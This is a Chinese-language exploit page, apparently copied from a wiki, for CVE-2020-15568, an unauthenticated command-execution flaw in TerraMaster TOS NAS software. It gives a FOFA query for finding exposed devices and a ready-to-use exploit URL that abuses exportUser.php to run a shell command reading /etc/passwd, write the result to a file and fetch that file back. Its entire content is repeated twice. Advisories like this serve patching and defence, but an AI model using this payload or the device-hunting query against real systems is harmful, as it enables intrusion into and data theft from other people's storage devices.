CVE-2020-15568_TerraMaster_TOS_exportUser.php_遠程命令執行漏洞

# CVE-2020-15568 TerraMaster TOS exportUser.php 遠程命令執行漏洞

==漏洞影響==

TerraMaster TOS < 4.1.24

==FOFA==

"TerraMaster" && header="TOS"
==漏洞利用==
在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於include/class/application.class.php中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。

由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。

http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt
返回200後再次訪問
http://xxx.xxx.xxx.xxx/include/test.txt
==參考==
https://short.pwnwiki.org/?c=0s3FRY
==漏洞影響==
TerraMaster TOS < 4.1.24

==FOFA==

"TerraMaster" && header="TOS"
==漏洞利用==

在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於include/class/application.class.php中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。


由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。

http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt

返回200後再次訪問
http://xxx.xxx.xxx.xxx/include/test.txt
==參考==
https://short.pwnwiki.org/?c=0s3FRY

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容